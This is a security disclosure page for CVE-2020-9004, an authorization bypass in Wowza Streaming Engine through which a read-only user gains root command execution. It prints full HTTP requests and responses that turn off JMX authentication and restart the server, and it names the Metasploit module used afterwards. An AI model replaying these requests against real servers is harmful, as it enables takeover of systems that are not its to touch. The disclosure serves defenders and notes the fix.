Headline
CVE-2020-9004: Disclosures/CVE-2020-9004-Authenticated Remote Authorization Bypass Leading to RCE-Wowza at master · DrunkenShells/Disclosures
A remote authenticated authorization-bypass vulnerability in Wowza Streaming Engine 4.8.0 and earlier allows any read-only user to issue requests to the administration panel in order to change functionality. For example, a read-only user may activate the Java JMX port in unauthenticated mode and execute OS commands under root privileges. This issue was resolved in Wowza Streaming Engine 4.8.5.
A remote authenticated authorization bypass vulnerability in Wowza Streaming Engine 4.7.8 (build 20191105123929), allows any read-only user to issue requests to the administration panel in order to change functionality of the application. For example a read only user may activate the java JMX port in unauthenticated mode and execute OS system commands under root privileges.
Evidence
*Figure 1 - Admin has access to JMX Remote Configuration
*Figure 2 - User “user” is read-only
*Figure 3 - User “user” has no access to JMX Remote Configuration
*Figure 4 - JMX Port 8085 closed
Request to activate JMX in unauthenticated mode and listen on all interfaces:
POST /enginemanager/server/serversetup/edit_adv.htm HTTP/1.1
Host: 192.168.101.128:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3835.0 Safari/537.36
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.101.128:8088/enginemanager/Home.htm
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 3841
Cookie: JSESSIONID=E3CA656F37B024F8E2C35E4871C1EC6B; DoNotShowFTU=true; showRightRail=true; lastMangerHost=http%3A//localhost%3A8087; lastTab=Advanced; JSESSIONID=BEA4C40611950C8725FB899535496B1F
Connection: close
vhost=_defaultVHost_&advSection=JMXRemoteConfiguration&advPath=%2FRoot%2FServer&advancedTables%5BJMXRemoteConfiguration%5D%5B0%5D.uiBooleanValue=true&advancedTables%5BJMXRemoteConfiguration%5D%5B0%5D.sectionName=JMXRemoteConfiguration&advancedTables%5BJMXRemoteConfiguration%5D%5B0%5D.section=&advancedTables%5BJMXRemoteConfiguration%5D%5B0%5D.type=Boolean&advancedTables%5BJMXRemoteConfiguration%5D%5B0%5D.name=enable&advancedTables%5BJMXRemoteConfiguration%5D%5B0%5D.canRemove=false&advancedTables%5BJMXRemoteConfiguration%5D%5B1%5D.value=localhost&advancedTables%5BJMXRemoteConfiguration%5D%5B1%5D.sectionName=JMXRemoteConfiguration&advancedTables%5BJMXRemoteConfiguration%5D%5B1%5D.section=&advancedTables%5BJMXRemoteConfiguration%5D%5B1%5D.type=String&advancedTables%5BJMXRemoteConfiguration%5D%5B1%5D.name=ipAddress&advancedTables%5BJMXRemoteConfiguration%5D%5B1%5D.canRemove=false&advancedTables%5BJMXRemoteConfiguration%5D%5B2%5D.value=0.0.0.0&advancedTables%5BJMXRemoteConfiguration%5D%5B2%5D.sectionName=JMXRemoteConfiguration&advancedTables%5BJMXRemoteConfiguration%5D%5B2%5D.section=&advancedTables%5BJMXRemoteConfiguration%5D%5B2%5D.type=String&advancedTables%5BJMXRemoteConfiguration%5D%5B2%5D.name=rmiServerHostName&advancedTables%5BJMXRemoteConfiguration%5D%5B2%5D.canRemove=false&advancedTables%5BJMXRemoteConfiguration%5D%5B3%5D.value=8084&advancedTables%5BJMXRemoteConfiguration%5D%5B3%5D.sectionName=JMXRemoteConfiguration&advancedTables%5BJMXRemoteConfiguration%5D%5B3%5D.section=&advancedTables%5BJMXRemoteConfiguration%5D%5B3%5D.type=Integer&advancedTables%5BJMXRemoteConfiguration%5D%5B3%5D.name=rmiConnectionPort&advancedTables%5BJMXRemoteConfiguration%5D%5B3%5D.canRemove=false&advancedTables%5BJMXRemoteConfiguration%5D%5B4%5D.uiBooleanValue=false&advancedTables%5BJMXRemoteConfiguration%5D%5B4%5D.sectionName=JMXRemoteConfiguration&advancedTables%5BJMXRemoteConfiguration%5D%5B4%5D.section=&advancedTables%5BJMXRemoteConfiguration%5D%5B4%5D.type=Boolean&advancedTables%5BJMXRemoteConfiguration%5D%5B4%5D.name=authenticate&advancedTables%5BJMXRemoteConfi<br />guration%5D%5B4%5D.canRemove=false&advancedTables%5BJMXRemoteConfiguration%5D%5B5%5D.value=8085&advancedTables%5BJMXRemoteConfiguration%5D%5B5%5D.sectionName=JMXRemoteConfiguration&advancedTables%5BJMXRemoteConfiguration%5D%5B5%5D.section=&advancedTables%5BJMXRemoteConfiguration%5D%5B5%5D.type=Integer&advancedTables%5BJMXRemoteConfiguration%5D%5B5%5D.name=rmiRegistryPort&advancedTables%5BJMXRemoteConfiguration%5D%5B5%5D.canRemove=false&advancedTables%5BJMXRemoteConfiguration%5D%5B6%5D.value=%24%7Bcom.wowza.wms.ConfigHome%7D%2Fconf%2Fjmxremote.password&advancedTables%5BJMXRemoteConfiguration%5D%5B6%5D.sectionName=JMXRemoteConfiguration&advancedTables%5BJMXRemoteConfiguration%5D%5B6%5D.section=&advancedTables%5BJMXRemoteConfiguration%5D%5B6%5D.type=String&advancedTables%5BJMXRemoteConfiguration%5D%5B6%5D.name=passwordFile&advancedTables%5BJMXRemoteConfiguration%5D%5B6%5D.canRemove=false&advancedTables%5BJMXRemoteConfiguration%5D%5B7%5D.value=%24%7Bcom.wowza.wms.ConfigHome%7D%2Fconf%2Fjmxremote.access&advancedTables%5BJMXRemoteConfiguration%5D%5B7%5D.sectionName=JMXRemoteConfiguration&advancedTables%5BJMXRemoteConfiguration%5D%5B7%5D.section=&advancedTables%5BJMXRemoteConfiguration%5D%5B7%5D.type=String&advancedTables%5BJMXRemoteConfiguration%5D%5B7%5D.name=accessFile&advancedTables%5BJMXRemoteConfiguration%5D%5B7%5D.canRemove=false&advancedTables%5BJMXRemoteConfiguration%5D%5B8%5D.uiBooleanValue=false&advancedTables%5BJMXRemoteConfiguration%5D%5B8%5D.sectionName=JMXRemoteConfiguration&advancedTables%5BJMXRemoteConfiguration%5D%5B8%5D.section=&advancedTables%5BJMXRemoteConfiguration%5D%5B8%5D.type=Boolean&advancedTables%5BJMXRemoteConfiguration%5D%5B8%5D.name=sslSecure&advancedTables%5BJMXRemoteConfiguration%5D%5B8%5D.canRemove=false
Response:
HTTP/1.1 200
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Fri, 14 Feb 2020 07:25:00 GMT
Connection: close
Content-Length: 138767
<div>
<div class="row">
<div id="generic.warnings" class="alert alert-warning" style="display:none"></div>
<div class="col-md-12">
<div class="alert alert-success" id="successMessage">
<strong><i class="fa fa-info-circle"></i> <strong>Saved!</strong> You must restart the server for changes to take effect. <a class="btn btn-sm btn-warning" onclick="javascript:restartServerShow()"><i class="fa fa-refresh"></i> Restart Now</a></strong>
</div>
</div>
</div>
<div class="row">
<div class="col-md-9">
<happ>
***TRUNCATED***
We have to reboot the service to apply changes.
Request:
POST /enginemanager/server/restart.htm HTTP/1.1
Host: 192.168.101.128:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3835.0 Safari/537.36
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.101.128:8088/enginemanager/Home.htm
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 446
Cookie: JSESSIONID=E3CA656F37B024F8E2C35E4871C1EC6B; DoNotShowFTU=true; showRightRail=true; lastMangerHost=http%3A//localhost%3A8087; lastTab=Advanced; JSESSIONID=BEA4C40611950C8725FB899535496B1F
Connection: close
vhost=_defaultVHost_&version=3161837623000&name=Wowza+Streaming+Engine&description=Wowza+Streaming+Engine+is+robust%2C+customizable%2C+and+scalable+server+software+that+powers+reliable+streaming+of+high-quality+video+and+audio+to+any+device%2C+anywhere.&licenseFile=ET1E4-XXXXX-XXXXX-XXXXX-XXXXX-XXXXX-BfWcpzFWMJ9&defaultStreamPrefix=mp4&statsEnabled=true&_statsEnabled=on&_rtpDataPortSharing=on&rtpDataPortSharingPort=6970&returnPage=serversetup
Response:
HTTP/1.1 200
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Fri, 14 Feb 2020 08:57:42 GMT
Connection: close
Content-Length: 138485
<div>
<div class="row">
<div id="generic.warnings" class="alert alert-warning" style="display:none"></div>
<div class="col-md-12">
<div class="alert alert-success" id="successMessage">
<strong>Server will restart in 5 seconds <script>setTimeout(function() { $('#successMessage').fadeOut('fast'); }, 10000);</script></strong>
</div>
</div>
***TRUNCATED***
*Figure 5 - JMX port 8085 opened
Using metasploit module multi/misc/java_jmx_server we obtained rce:
*Figure 6 - RCE